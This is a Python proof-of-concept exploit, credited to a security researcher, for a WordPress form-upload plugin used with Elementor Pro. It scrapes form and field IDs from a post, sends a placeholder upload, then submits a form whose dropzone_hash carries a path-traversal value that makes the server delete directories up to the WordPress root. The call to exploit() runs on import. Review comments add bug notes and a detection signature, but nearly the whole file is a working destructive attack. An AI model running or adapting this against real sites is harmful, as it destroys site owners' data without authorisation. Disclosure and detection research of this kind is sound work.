import re
from io import BytesIO
import requests
"""
Author: Mat Rollings (stealthcopter)
Website: sec.stealthcopter.com
"""
TARGET = 'http://wordpress.local:1337'
POST_ID = 15
PATH = '../../../../../pyslurper/'
# ../../../ = /wp-content/uploads/elementor
# ../../../../ = /wp-content/uploads/
# ../../../../../ = /wp-content/
# ../../../../../../ = / (root WordPress dir)
# Note that the first two are recoverable, but the latter few are prob going to destroy your WordPress instance.
session = requests.session()
# Proxy can be uncommented here for debugging:
# session.proxies = {'http': 'http://localhost:8080'}
def dummy_upload(field_id):
    """Send a placeholder upload to the drop-zone AJAX handler.

    exploit() calls this before do_delete() because, per its comment, the
    path has to exist first. Prints the raw response body; returns None.

    field_id: the form_fields key found by get_field_id(); sent under the
        fixed key 'hash_961'.
    """
    # Create a fake JPG file in memory; only the filename and MIME type are
    # JPEG-like, the content is four bytes of 'A'
    fake_file = BytesIO(b'AAAA')
    fake_file.name = 'hello.jpg'
    files = {
        'file': ('hello.jpg', fake_file, 'image/jpeg')
    }
    data = {
        'hash_961': field_id
    }
    # NOTE(review): posts via the module-level `requests`, not `session`, so
    # cookies from the earlier GETs are not sent with this request.
    response = requests.post(f'{TARGET}/wp-admin/admin-ajax.php?action=startklar_drop_zone_upload_process', files=files, data=data)
    print(response.text)
def get_form_id(post_id):
    """Return the hidden ``form_id`` value from the page at TARGET/?p=<post_id>.

    Fetches the post through the shared session and extracts the first
    alphanumeric ``value`` of an input named ``form_id``. If the page has no
    such input, ``re.search`` yields None and ``.group`` raises
    AttributeError — the caller's falsy check never sees that case.
    """
    page = session.get(f'{TARGET}/?p={post_id}').text
    match = re.search(r'name="form_id" value="([a-zA-Z0-9]+)"', page)
    return match.group(1)
def get_field_id(post_id):
    """Return the first ``form_fields[field_…]`` name from the page at TARGET/?p=<post_id>.

    Fetches the post through the shared session (a second GET of the same
    page as get_form_id()) and returns the captured ``field_<id>`` token.
    With no matching input, ``re.search`` yields None and ``.group`` raises
    AttributeError rather than returning a falsy value.
    """
    page = session.get(f'{TARGET}/?p={post_id}').text
    match = re.search(r'name="form_fields\[(field_[a-zA-Z0-9]+)\]"', page)
    return match.group(1)
def do_delete(post_id, form_id, field_id, path):
    """POST an Elementor Pro form submission whose file field carries ``path``.

    The ``form_fields[<field_id>]`` value is a JSON string built by plain
    concatenation: ``path`` is spliced into ``"dropzone_hash"`` unescaped and
    ``"path_type"`` is ``"abs_path"``. Per the path table at the top of the
    file, the server acts destructively on that directory. For detection,
    this request is the one to key on: admin-ajax.php with
    action=elementor_pro_forms_send_form and '../' inside dropzone_hash.
    Prints the raw response body; returns None.
    """
    data = {
        'action': 'elementor_pro_forms_send_form',
        'post_id': post_id,
        'queried_id': post_id,
        'form_id': form_id,
        # NOTE: no JSON encoding of `path`; a quote in it would break the payload
        f'form_fields[{field_id}]': '{"files_amount":1,"allowed_file_types_for_upload":".jpg, .pdf, .png, .php","maximum_upload_file":10,"path_type":"abs_path","dropzone_hash":"'+path+'"}',
    }
    r = session.post(f'{TARGET}/wp-admin/admin-ajax.php', data=data)
    print(r.text)
def exploit():
    """Run the full sequence against TARGET/POST_ID with the module-level PATH.

    Steps: scrape form_id and field_id from the post page, send the
    placeholder upload, then submit the form carrying PATH.
    Returns False on a falsy form_id/field_id, otherwise None.

    NOTE(review): the two falsy checks below are effectively dead —
    get_form_id()/get_field_id() raise AttributeError when their regex has
    no match, so a missing field surfaces as a traceback, not the message.
    """
    form_id = get_form_id(POST_ID)
    if not form_id:
        print('[!] Error could not get form id')
        return False
    print(f'[+] Form ID: {form_id}')
    field_id = get_field_id(POST_ID)
    if not field_id:
        print('[!] Error could not get field id')
        return False
    print(f'[+] Field ID: {field_id}')
    # Need a dummy upload so that the path exists...
    dummy_upload(field_id)
    do_delete(POST_ID, form_id, field_id, PATH)
# Runs unconditionally at import time as well as when executed directly
# (there is no ``if __name__ == '__main__'`` guard).
exploit()